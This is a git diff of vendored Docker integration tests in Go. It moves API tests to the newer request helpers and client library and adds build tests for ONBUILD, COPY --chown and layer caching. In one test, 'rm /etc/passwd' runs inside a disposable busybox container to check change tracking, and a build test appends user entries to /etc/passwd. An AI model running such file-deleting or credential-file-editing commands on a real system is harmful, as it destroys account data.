 	cid, _ = dockerCmd(c, "run", "-dit", "busybox", "/bin/sh", "-c", "cat >&2")
 	cid = strings.TrimSpace(cid)
 	// Attach to stdout only.
-	conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain")
+	conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain", daemonHost())
 	c.Assert(err, checker.IsNil)
 	expectSuccess(conn, br, "stdout", true)
 
 	// Attach without stdout stream.
-	conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain")
+	conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain", daemonHost())
 	c.Assert(err, checker.IsNil)
 	// Nothing should be received because both the stdout and stderr of the container will be
 	// sent to the client as stdout when tty is enabled.
 	expectTimeout(conn, br, "stdout")
 
 	// Test the client API
-	// Make sure we don't see "hello" if Logs is false
 	client, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
+	defer client.Close()
 
 	cid, _ = dockerCmd(c, "run", "-di", "busybox", "/bin/sh", "-c", "echo hello; cat")
 	cid = strings.TrimSpace(cid)
 
+	// Make sure we don't see "hello" if Logs is false
 	attachOpts := types.ContainerAttachOptions{
 		Stream: true,
 		Stdin:  true,
 		Stdout: true,
+		Stderr: true,
+		Logs:   false,
 	}
 
 	resp, err := client.ContainerAttach(context.Background(), cid, attachOpts)
@@ -203,8 +208,53 @@ func (s *DockerSuite) TestPostContainersAttach(c *check.C) {
 	_, err = resp.Conn.Write([]byte("success"))
 	c.Assert(err, checker.IsNil)
 
-	actualStdout := new(bytes.Buffer)
-	actualStderr := new(bytes.Buffer)
-	stdcopy.StdCopy(actualStdout, actualStderr, resp.Reader)
-	c.Assert(actualStdout.Bytes(), checker.DeepEquals, []byte("hello\nsuccess"), check.Commentf("Attach didn't return the expected data from stdout"))
+	var outBuf, errBuf bytes.Buffer
+	_, err = stdcopy.StdCopy(&outBuf, &errBuf, resp.Reader)
+	if err != nil && errors.Cause(err).(net.Error).Timeout() {
+		// ignore the timeout error as it is expected
+		err = nil
+	}
+	c.Assert(err, checker.IsNil)
+	c.Assert(errBuf.String(), checker.Equals, "")
+	c.Assert(outBuf.String(), checker.Equals, "hello\nsuccess")
+}
+
+// SockRequestHijack creates a connection to specified host (with method, contenttype, …) and returns a hijacked connection
+// and the output as a `bufio.Reader`
+func sockRequestHijack(method, endpoint string, data io.Reader, ct string, daemon string, modifiers ...func(*http.Request)) (net.Conn, *bufio.Reader, error) {
+	req, client, err := newRequestClient(method, endpoint, data, ct, daemon, modifiers...)
+	if err != nil {
+		return nil, nil, err
+	}
+
+	client.Do(req)
+	conn, br := client.Hijack()
+	return conn, br, nil
+}
+
+// FIXME(vdemeester) httputil.ClientConn is deprecated, use http.Client instead (closer to actual client)
+// Deprecated: Use New instead of NewRequestClient
+// Deprecated: use request.Do (or Get, Delete, Post) instead
+func newRequestClient(method, endpoint string, data io.Reader, ct, daemon string, modifiers ...func(*http.Request)) (*http.Request, *httputil.ClientConn, error) {
+	c, err := request.SockConn(time.Duration(10*time.Second), daemon)
+	if err != nil {
+		return nil, nil, fmt.Errorf("could not dial docker daemon: %v", err)
+	}
+
+	client := httputil.NewClientConn(c, nil)
+
+	req, err := http.NewRequest(method, endpoint, data)
+	if err != nil {
+		client.Close()
+		return nil, nil, fmt.Errorf("could not create new request: %v", err)
+	}
+
+	for _, opt := range modifiers {
+		opt(req)
+	}
+
+	if ct != "" {
+		req.Header.Set("Content-Type", ct)
+	}
+	return req, client, nil
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_auth_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_auth_test.go
deleted file mode 100644
index bfcae31bd0..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_api_auth_test.go
+++ /dev/null
@@ -1,25 +0,0 @@
-package main
-
-import (
-	"net/http"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-// Test case for #22244
-func (s *DockerSuite) TestAuthAPI(c *check.C) {
-	testRequires(c, Network)
-	config := types.AuthConfig{
-		Username: "no-user",
-		Password: "no-password",
-	}
-
-	expected := "Get https://registry-1.docker.io/v2/: unauthorized: incorrect username or password"
-	status, body, err := sockRequest("POST", "/auth", config)
-	c.Assert(err, check.IsNil)
-	c.Assert(status, check.Equals, http.StatusUnauthorized)
-	msg := getErrorMessage(c, body)
-	c.Assert(msg, checker.Contains, expected, check.Commentf("Expected: %v, got: %v", expected, msg))
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_build_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_build_test.go
index 9b069a43a6..144acbd046 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_api_build_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_build_test.go
@@ -3,44 +3,54 @@ package main
 import (
 	"archive/tar"
 	"bytes"
+	"context"
+	"encoding/json"
+	"fmt"
+	"io"
+	"io/ioutil"
 	"net/http"
 	"regexp"
 	"strings"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/internal/test/fakecontext"
+	"github.com/docker/docker/internal/test/fakegit"
+	"github.com/docker/docker/internal/test/fakestorage"
+	"github.com/docker/docker/internal/test/request"
 	"github.com/go-check/check"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 func (s *DockerSuite) TestBuildAPIDockerFileRemote(c *check.C) {
 	testRequires(c, NotUserNamespace)
+
 	var testD string
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		testD = `FROM busybox
-COPY * /tmp/
 RUN find / -name ba*
 RUN find /tmp/`
 	} else {
 		// -xdev is required because sysfs can cause EPERM
 		testD = `FROM busybox
-COPY * /tmp/
 RUN find / -xdev -name ba*
 RUN find /tmp/`
 	}
-	server, err := fakeStorage(map[string]string{"testD": testD})
-	c.Assert(err, checker.IsNil)
+	server := fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{"testD": testD}))
 	defer server.Close()
 
-	res, body, err := sockRequestRaw("POST", "/build?dockerfile=baz&remote="+server.URL()+"/testD", nil, "application/json")
+	res, body, err := request.Post("/build?dockerfile=baz&remote="+server.URL()+"/testD", request.JSON)
 	c.Assert(err, checker.IsNil)
 	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
 
-	buf, err := readBody(body)
+	buf, err := request.ReadBody(body)
 	c.Assert(err, checker.IsNil)
 
 	// Make sure Dockerfile exists.
 	// Make sure 'baz' doesn't exist ANYWHERE despite being mentioned in the URL
 	out := string(buf)
-	c.Assert(out, checker.Contains, "/tmp/Dockerfile")
+	c.Assert(out, checker.Contains, "RUN find /tmp")
 	c.Assert(out, checker.Not(checker.Contains), "baz")
 }
 
@@ -64,14 +74,12 @@ func (s *DockerSuite) TestBuildAPIRemoteTarballContext(c *check.C) {
 	// failed to close tar archive
 	c.Assert(tw.Close(), checker.IsNil)
 
-	server, err := fakeBinaryStorage(map[string]*bytes.Buffer{
+	server := fakestorage.New(c, "", fakecontext.WithBinaryFiles(map[string]*bytes.Buffer{
 		"testT.tar": buffer,
-	})
-	c.Assert(err, checker.IsNil)
-
+	}))
 	defer server.Close()
 
-	res, b, err := sockRequestRaw("POST", "/build?remote="+server.URL()+"/testT.tar", nil, "application/tar")
+	res, b, err := request.Post("/build?remote="+server.URL()+"/testT.tar", request.ContentType("application/tar"))
 	c.Assert(err, checker.IsNil)
 	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
 	b.Close()
@@ -113,19 +121,18 @@ RUN echo 'right'
 	// failed to close tar archive
 	c.Assert(tw.Close(), checker.IsNil)
 
-	server, err := fakeBinaryStorage(map[string]*bytes.Buffer{
+	server := fakestorage.New(c, "", fakecontext.WithBinaryFiles(map[string]*bytes.Buffer{
 		"testT.tar": buffer,
-	})
-	c.Assert(err, checker.IsNil)
-
+	}))
 	defer server.Close()
+
 	url := "/build?dockerfile=custom&remote=" + server.URL() + "/testT.tar"
-	res, body, err := sockRequestRaw("POST", url, nil, "application/tar")
+	res, body, err := request.Post(url, request.ContentType("application/tar"))
 	c.Assert(err, checker.IsNil)
 	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
 
 	defer body.Close()
-	content, err := readBody(body)
+	content, err := request.ReadBody(body)
 	c.Assert(err, checker.IsNil)
 
 	// Build used the wrong dockerfile.
@@ -133,18 +140,17 @@ RUN echo 'right'
 }
 
 func (s *DockerSuite) TestBuildAPILowerDockerfile(c *check.C) {
-	git, err := newFakeGit("repo", map[string]string{
+	git := fakegit.New(c, "repo", map[string]string{
 		"dockerfile": `FROM busybox
 RUN echo from dockerfile`,
 	}, false)
-	c.Assert(err, checker.IsNil)
 	defer git.Close()
 
-	res, body, err := sockRequestRaw("POST", "/build?remote="+git.RepoURL, nil, "application/json")
+	res, body, err := request.Post("/build?remote="+git.RepoURL, request.JSON)
 	c.Assert(err, checker.IsNil)
 	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
 
-	buf, err := readBody(body)
+	buf, err := request.ReadBody(body)
 	c.Assert(err, checker.IsNil)
 
 	out := string(buf)
@@ -152,21 +158,20 @@ RUN echo from dockerfile`,
 }
 
 func (s *DockerSuite) TestBuildAPIBuildGitWithF(c *check.C) {
-	git, err := newFakeGit("repo", map[string]string{
+	git := fakegit.New(c, "repo", map[string]string{
 		"baz": `FROM busybox
 RUN echo from baz`,
 		"Dockerfile": `FROM busybox
 RUN echo from Dockerfile`,
 	}, false)
-	c.Assert(err, checker.IsNil)
 	defer git.Close()
 
 	// Make sure it tries to 'dockerfile' query param value
-	res, body, err := sockRequestRaw("POST", "/build?dockerfile=baz&remote="+git.RepoURL, nil, "application/json")
+	res, body, err := request.Post("/build?dockerfile=baz&remote="+git.RepoURL, request.JSON)
 	c.Assert(err, checker.IsNil)
 	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
 
-	buf, err := readBody(body)
+	buf, err := request.ReadBody(body)
 	c.Assert(err, checker.IsNil)
 
 	out := string(buf)
@@ -175,21 +180,20 @@ RUN echo from Dockerfile`,
 
 func (s *DockerSuite) TestBuildAPIDoubleDockerfile(c *check.C) {
 	testRequires(c, UnixCli) // dockerfile overwrites Dockerfile on Windows
-	git, err := newFakeGit("repo", map[string]string{
+	git := fakegit.New(c, "repo", map[string]string{
 		"Dockerfile": `FROM busybox
 RUN echo from Dockerfile`,
 		"dockerfile": `FROM busybox
 RUN echo from dockerfile`,
 	}, false)
-	c.Assert(err, checker.IsNil)
 	defer git.Close()
 
 	// Make sure it tries to 'dockerfile' query param value
-	res, body, err := sockRequestRaw("POST", "/build?remote="+git.RepoURL, nil, "application/json")
+	res, body, err := request.Post("/build?remote="+git.RepoURL, request.JSON)
 	c.Assert(err, checker.IsNil)
 	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
 
-	buf, err := readBody(body)
+	buf, err := request.ReadBody(body)
 	c.Assert(err, checker.IsNil)
 
 	out := string(buf)
@@ -232,11 +236,11 @@ func (s *DockerSuite) TestBuildAPIUnnormalizedTarPaths(c *check.C) {
 		// failed to close tar archive
 		c.Assert(tw.Close(), checker.IsNil)
 
-		res, body, err := sockRequestRaw("POST", "/build", buffer, "application/x-tar")
+		res, body, err := request.Post("/build", request.RawContent(ioutil.NopCloser(buffer)), request.ContentType("application/x-tar"))
 		c.Assert(err, checker.IsNil)
 		c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
 
-		out, err := readBody(body)
+		out, err := request.ReadBody(body)
 		c.Assert(err, checker.IsNil)
 		lines := strings.Split(string(out), "\n")
 		c.Assert(len(lines), checker.GreaterThan, 1)
@@ -252,3 +256,303 @@ func (s *DockerSuite) TestBuildAPIUnnormalizedTarPaths(c *check.C) {
 
 	c.Assert(imageA, checker.Not(checker.Equals), imageB)
 }
+
+func (s *DockerSuite) TestBuildOnBuildWithCopy(c *check.C) {
+	dockerfile := `
+		FROM ` + minimalBaseImage() + ` as onbuildbase
+		ONBUILD COPY file /file
+
+		FROM onbuildbase
+	`
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(dockerfile),
+		fakecontext.WithFile("file", "some content"),
+	)
+	defer ctx.Close()
+
+	res, body, err := request.Post(
+		"/build",
+		request.RawContent(ctx.AsTarReader(c)),
+		request.ContentType("application/x-tar"))
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
+
+	out, err := request.ReadBody(body)
+	c.Assert(err, checker.IsNil)
+	c.Assert(string(out), checker.Contains, "Successfully built")
+}
+
+func (s *DockerSuite) TestBuildOnBuildCache(c *check.C) {
+	build := func(dockerfile string) []byte {
+		ctx := fakecontext.New(c, "",
+			fakecontext.WithDockerfile(dockerfile),
+		)
+		defer ctx.Close()
+
+		res, body, err := request.Post(
+			"/build",
+			request.RawContent(ctx.AsTarReader(c)),
+			request.ContentType("application/x-tar"))
+		assert.NilError(c, err)
+		assert.Check(c, is.DeepEqual(http.StatusOK, res.StatusCode))
+
+		out, err := request.ReadBody(body)
+		assert.NilError(c, err)
+		assert.Check(c, is.Contains(string(out), "Successfully built"))
+		return out
+	}
+
+	dockerfile := `
+		FROM ` + minimalBaseImage() + ` as onbuildbase
+		ENV something=bar
+		ONBUILD ENV foo=bar
+	`
+	build(dockerfile)
+
+	dockerfile += "FROM onbuildbase"
+	out := build(dockerfile)
+
+	imageIDs := getImageIDsFromBuild(c, out)
+	assert.Check(c, is.Len(imageIDs, 2))
+	parentID, childID := imageIDs[0], imageIDs[1]
+
+	client := testEnv.APIClient()
+
+	// check parentID is correct
+	image, _, err := client.ImageInspectWithRaw(context.Background(), childID)
+	assert.NilError(c, err)
+	assert.Check(c, is.Equal(parentID, image.Parent))
+}
+
+func (s *DockerRegistrySuite) TestBuildCopyFromForcePull(c *check.C) {
+	client := testEnv.APIClient()
+
+	repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL)
+	// tag the image to upload it to the private registry
+	err := client.ImageTag(context.TODO(), "busybox", repoName)
+	assert.Check(c, err)
+	// push the image to the registry
+	rc, err := client.ImagePush(context.TODO(), repoName, types.ImagePushOptions{RegistryAuth: "{}"})
+	assert.Check(c, err)
+	_, err = io.Copy(ioutil.Discard, rc)
+	assert.Check(c, err)
+
+	dockerfile := fmt.Sprintf(`
+		FROM %s AS foo
+		RUN touch abc
+		FROM %s
+		COPY --from=foo /abc /
+		`, repoName, repoName)
+
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(dockerfile),
+	)
+	defer ctx.Close()
+
+	res, body, err := request.Post(
+		"/build?pull=1",
+		request.RawContent(ctx.AsTarReader(c)),
+		request.ContentType("application/x-tar"))
+	assert.NilError(c, err)
+	assert.Check(c, is.DeepEqual(http.StatusOK, res.StatusCode))
+
+	out, err := request.ReadBody(body)
+	assert.NilError(c, err)
+	assert.Check(c, is.Contains(string(out), "Successfully built"))
+}
+
+func (s *DockerSuite) TestBuildAddRemoteNoDecompress(c *check.C) {
+	buffer := new(bytes.Buffer)
+	tw := tar.NewWriter(buffer)
+	dt := []byte("contents")
+	err := tw.WriteHeader(&tar.Header{
+		Name:     "foo",
+		Size:     int64(len(dt)),
+		Mode:     0600,
+		Typeflag: tar.TypeReg,
+	})
+	assert.NilError(c, err)
+	_, err = tw.Write(dt)
+	assert.NilError(c, err)
+	err = tw.Close()
+	assert.NilError(c, err)
+
+	server := fakestorage.New(c, "", fakecontext.WithBinaryFiles(map[string]*bytes.Buffer{
+		"test.tar": buffer,
+	}))
+	defer server.Close()
+
+	dockerfile := fmt.Sprintf(`
+		FROM busybox
+		ADD %s/test.tar /
+		RUN [ -f test.tar ]
+		`, server.URL())
+
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(dockerfile),
+	)
+	defer ctx.Close()
+
+	res, body, err := request.Post(
+		"/build",
+		request.RawContent(ctx.AsTarReader(c)),
+		request.ContentType("application/x-tar"))
+	assert.NilError(c, err)
+	assert.Check(c, is.DeepEqual(http.StatusOK, res.StatusCode))
+
+	out, err := request.ReadBody(body)
+	assert.NilError(c, err)
+	assert.Check(c, is.Contains(string(out), "Successfully built"))
+}
+
+func (s *DockerSuite) TestBuildChownOnCopy(c *check.C) {
+	// new feature added in 1.31 - https://github.com/moby/moby/pull/34263
+	testRequires(c, DaemonIsLinux, MinimumAPIVersion("1.31"))
+	dockerfile := `FROM busybox
+		RUN echo 'test1:x:1001:1001::/bin:/bin/false' >> /etc/passwd
+		RUN echo 'test1:x:1001:' >> /etc/group
+		RUN echo 'test2:x:1002:' >> /etc/group
+		COPY --chown=test1:1002 . /new_dir
+		RUN ls -l /
+		RUN [ $(ls -l / | grep new_dir | awk '{print $3":"$4}') = 'test1:test2' ]
+		RUN [ $(ls -nl / | grep new_dir | awk '{print $3":"$4}') = '1001:1002' ]
+	`
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(dockerfile),
+		fakecontext.WithFile("test_file1", "some test content"),
+	)
+	defer ctx.Close()
+
+	res, body, err := request.Post(
+		"/build",
+		request.RawContent(ctx.AsTarReader(c)),
+		request.ContentType("application/x-tar"))
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
+
+	out, err := request.ReadBody(body)
+	assert.NilError(c, err)
+	assert.Check(c, is.Contains(string(out), "Successfully built"))
+}
+
+func (s *DockerSuite) TestBuildCopyCacheOnFileChange(c *check.C) {
+
+	dockerfile := `FROM busybox
+COPY file /file`
+
+	ctx1 := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(dockerfile),
+		fakecontext.WithFile("file", "foo"))
+	ctx2 := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(dockerfile),
+		fakecontext.WithFile("file", "bar"))
+
+	var build = func(ctx *fakecontext.Fake) string {
+		res, body, err := request.Post("/build",
+			request.RawContent(ctx.AsTarReader(c)),
+			request.ContentType("application/x-tar"))
+
+		assert.NilError(c, err)
+		assert.Check(c, is.DeepEqual(http.StatusOK, res.StatusCode))
+
+		out, err := request.ReadBody(body)
+		assert.NilError(c, err)
+
+		ids := getImageIDsFromBuild(c, out)
+		return ids[len(ids)-1]
+	}
+
+	id1 := build(ctx1)
+	id2 := build(ctx1)
+	id3 := build(ctx2)
+
+	if id1 != id2 {
+		c.Fatal("didn't use the cache")
+	}
+	if id1 == id3 {
+		c.Fatal("COPY With different source file should not share same cache")
+	}
+}
+
+func (s *DockerSuite) TestBuildAddCacheOnFileChange(c *check.C) {
+
+	dockerfile := `FROM busybox
+ADD file /file`
+
+	ctx1 := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(dockerfile),
+		fakecontext.WithFile("file", "foo"))
+	ctx2 := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(dockerfile),
+		fakecontext.WithFile("file", "bar"))
+
+	var build = func(ctx *fakecontext.Fake) string {
+		res, body, err := request.Post("/build",
+			request.RawContent(ctx.AsTarReader(c)),
+			request.ContentType("application/x-tar"))
+
+		assert.NilError(c, err)
+		assert.Check(c, is.DeepEqual(http.StatusOK, res.StatusCode))
+
+		out, err := request.ReadBody(body)
+		assert.NilError(c, err)
+
+		ids := getImageIDsFromBuild(c, out)
+		return ids[len(ids)-1]
+	}
+
+	id1 := build(ctx1)
+	id2 := build(ctx1)
+	id3 := build(ctx2)
+
+	if id1 != id2 {
+		c.Fatal("didn't use the cache")
+	}
+	if id1 == id3 {
+		c.Fatal("COPY With different source file should not share same cache")
+	}
+}
+
+func (s *DockerSuite) TestBuildScratchCopy(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	dockerfile := `FROM scratch
+ADD Dockerfile /
+ENV foo bar`
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(dockerfile),
+	)
+	defer ctx.Close()
+
+	res, body, err := request.Post(
+		"/build",
+		request.RawContent(ctx.AsTarReader(c)),
+		request.ContentType("application/x-tar"))
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
+
+	out, err := request.ReadBody(body)
+	assert.NilError(c, err)
+	assert.Check(c, is.Contains(string(out), "Successfully built"))
+}
+
+type buildLine struct {
+	Stream string
+	Aux    struct {
+		ID string
+	}
+}
+
+func getImageIDsFromBuild(c *check.C, output []byte) []string {
+	var ids []string
+	for _, line := range bytes.Split(output, []byte("\n")) {
+		if len(line) == 0 {
+			continue
+		}
+		entry := buildLine{}
+		assert.NilError(c, json.Unmarshal(line, &entry))
+		if entry.Aux.ID != "" {
+			ids = append(ids, entry.Aux.ID)
+		}
+	}
+	return ids
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_build_windows_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_build_windows_test.go
new file mode 100644
index 0000000000..a605c5be39
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_build_windows_test.go
@@ -0,0 +1,39 @@
+// +build windows
+
+package main
+
+import (
+	"net/http"
+
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/internal/test/fakecontext"
+	"github.com/docker/docker/internal/test/request"
+	"github.com/go-check/check"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func (s *DockerSuite) TestBuildWithRecycleBin(c *check.C) {
+	testRequires(c, DaemonIsWindows)
+
+	dockerfile := "" +
+		"FROM " + testEnv.PlatformDefaults.BaseImage + "\n" +
+		"RUN md $REcycLE.biN && md missing\n" +
+		"RUN dir $Recycle.Bin && exit 1 || exit 0\n" +
+		"RUN dir missing\n"
+
+	ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(dockerfile))
+	defer ctx.Close()
+
+	res, body, err := request.Post(
+		"/build",
+		request.RawContent(ctx.AsTarReader(c)),
+		request.ContentType("application/x-tar"))
+
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
+
+	out, err := request.ReadBody(body)
+	assert.NilError(c, err)
+	assert.Check(c, is.Contains(string(out), "Successfully built"))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_containers_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_containers_test.go
index d046ec0684..e8e47bd8b1 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_api_containers_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_containers_test.go
@@ -3,16 +3,16 @@ package main
 import (
 	"archive/tar"
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io"
 	"io/ioutil"
 	"net/http"
-	"net/http/httputil"
-	"net/url"
 	"os"
 	"path/filepath"
 	"regexp"
+	"runtime"
 	"strconv"
 	"strings"
 	"time"
@@ -21,51 +21,64 @@ import (
 	containertypes "github.com/docker/docker/api/types/container"
 	mounttypes "github.com/docker/docker/api/types/mount"
 	networktypes "github.com/docker/docker/api/types/network"
-	"github.com/docker/docker/pkg/integration"
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
+	"github.com/docker/docker/integration-cli/cli/build"
+	"github.com/docker/docker/internal/test/request"
 	"github.com/docker/docker/pkg/ioutils"
 	"github.com/docker/docker/pkg/mount"
 	"github.com/docker/docker/pkg/stringid"
 	"github.com/docker/docker/volume"
+	"github.com/docker/go-connections/nat"
 	"github.com/go-check/check"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/poll"
 )
 
 func (s *DockerSuite) TestContainerAPIGetAll(c *check.C) {
-	startCount, err := getContainerCount()
-	c.Assert(err, checker.IsNil, check.Commentf("Cannot query container count"))
-
+	startCount := getContainerCount(c)
 	name := "getall"
 	dockerCmd(c, "run", "--name", name, "busybox", "true")
 
-	status, body, err := sockRequest("GET", "/containers/json?all=1", nil)
+	cli, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK)
+	defer cli.Close()
 
-	var inspectJSON []struct {
-		Names []string
+	options := types.ContainerListOptions{
+		All: true,
 	}
-	err = json.Unmarshal(body, &inspectJSON)
-	c.Assert(err, checker.IsNil, check.Commentf("unable to unmarshal response body"))
-
-	c.Assert(inspectJSON, checker.HasLen, startCount+1)
-
-	actual := inspectJSON[0].Names[0]
+	containers, err := cli.ContainerList(context.Background(), options)
+	c.Assert(err, checker.IsNil)
+	c.Assert(containers, checker.HasLen, startCount+1)
+	actual := containers[0].Names[0]
 	c.Assert(actual, checker.Equals, "/"+name)
 }
 
 // regression test for empty json field being omitted #13691
 func (s *DockerSuite) TestContainerAPIGetJSONNoFieldsOmitted(c *check.C) {
+	startCount := getContainerCount(c)
 	dockerCmd(c, "run", "busybox", "true")
 
-	status, body, err := sockRequest("GET", "/containers/json?all=1", nil)
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	options := types.ContainerListOptions{
+		All: true,
+	}
+	containers, err := cli.ContainerList(context.Background(), options)
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK)
+	c.Assert(containers, checker.HasLen, startCount+1)
+	actual := fmt.Sprintf("%+v", containers[0])
 
 	// empty Labels field triggered this bug, make sense to check for everything
 	// cause even Ports for instance can trigger this bug
 	// better safe than sorry..
 	fields := []string{
-		"Id",
+		"ID",
 		"Names",
 		"Image",
 		"Command",
@@ -79,7 +92,7 @@ func (s *DockerSuite) TestContainerAPIGetJSONNoFieldsOmitted(c *check.C) {
 	// decoding into types.Container do not work since it eventually unmarshal
 	// and empty field to an empty go map, so we just check for a string
 	for _, f := range fields {
-		if !strings.Contains(string(body), f) {
+		if !strings.Contains(actual, f) {
 			c.Fatalf("Field %s is missing and it shouldn't", f)
 		}
 	}
@@ -87,7 +100,7 @@ func (s *DockerSuite) TestContainerAPIGetJSONNoFieldsOmitted(c *check.C) {
 
 type containerPs struct {
 	Names []string
-	Ports []map[string]interface{}
+	Ports []types.Port
 }
 
 // regression test for non-empty fields from #13901
@@ -98,30 +111,30 @@ func (s *DockerSuite) TestContainerAPIPsOmitFields(c *check.C) {
 	port := 80
 	runSleepingContainer(c, "--name", name, "--expose", strconv.Itoa(port))
 
-	status, body, err := sockRequest("GET", "/containers/json?all=1", nil)
+	cli, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK)
+	defer cli.Close()
 
-	var resp []containerPs
-	err = json.Unmarshal(body, &resp)
+	options := types.ContainerListOptions{
+		All: true,
+	}
+	containers, err := cli.ContainerList(context.Background(), options)
 	c.Assert(err, checker.IsNil)
-
-	var foundContainer *containerPs
-	for _, container := range resp {
-		for _, testName := range container.Names {
+	var foundContainer containerPs
+	for _, c := range containers {
+		for _, testName := range c.Names {
 			if "/"+name == testName {
-				foundContainer = &container
+				foundContainer.Names = c.Names
+				foundContainer.Ports = c.Ports
 				break
 			}
 		}
 	}
 
 	c.Assert(foundContainer.Ports, checker.HasLen, 1)
-	c.Assert(foundContainer.Ports[0]["PrivatePort"], checker.Equals, float64(port))
-	_, ok := foundContainer.Ports[0]["PublicPort"]
-	c.Assert(ok, checker.Not(checker.Equals), true)
-	_, ok = foundContainer.Ports[0]["IP"]
-	c.Assert(ok, checker.Not(checker.Equals), true)
+	c.Assert(foundContainer.Ports[0].PrivatePort, checker.Equals, uint16(port))
+	c.Assert(foundContainer.Ports[0].PublicPort, checker.NotNil)
+	c.Assert(foundContainer.Ports[0].IP, checker.NotNil)
 }
 
 func (s *DockerSuite) TestContainerAPIGetExport(c *check.C) {
@@ -130,12 +143,15 @@ func (s *DockerSuite) TestContainerAPIGetExport(c *check.C) {
 	name := "exportcontainer"
 	dockerCmd(c, "run", "--name", name, "busybox", "touch", "/test")
 
-	status, body, err := sockRequest("GET", "/containers/"+name+"/export", nil)
+	cli, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK)
+	defer cli.Close()
 
+	body, err := cli.ContainerExport(context.Background(), name)
+	c.Assert(err, checker.IsNil)
+	defer body.Close()
 	found := false
-	for tarReader := tar.NewReader(bytes.NewReader(body)); ; {
+	for tarReader := tar.NewReader(body); ; {
 		h, err := tarReader.Next()
 		if err != nil && err == io.EOF {
 			break
@@ -154,15 +170,12 @@ func (s *DockerSuite) TestContainerAPIGetChanges(c *check.C) {
 	name := "changescontainer"
 	dockerCmd(c, "run", "--name", name, "busybox", "rm", "/etc/passwd")
 
-	status, body, err := sockRequest("GET", "/containers/"+name+"/changes", nil)
+	cli, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK)
+	defer cli.Close()
 
-	changes := []struct {
-		Kind int
-		Path string
-	}{}
-	c.Assert(json.Unmarshal(body, &changes), checker.IsNil, check.Commentf("unable to unmarshal response body"))
+	changes, err := cli.ContainerDiff(context.Background(), name)
+	c.Assert(err, checker.IsNil)
 
 	// Check the changelog for removal of /etc/passwd
 	success := false
@@ -181,14 +194,19 @@ func (s *DockerSuite) TestGetContainerStats(c *check.C) {
 	runSleepingContainer(c, "--name", name)
 
 	type b struct {
-		status int
-		body   []byte
-		err    error
+		stats types.ContainerStats
+		err   error
 	}
+
 	bc := make(chan b, 1)
 	go func() {
-		status, body, err := sockRequest("GET", "/containers/"+name+"/stats", nil)
-		bc <- b{status, body, err}
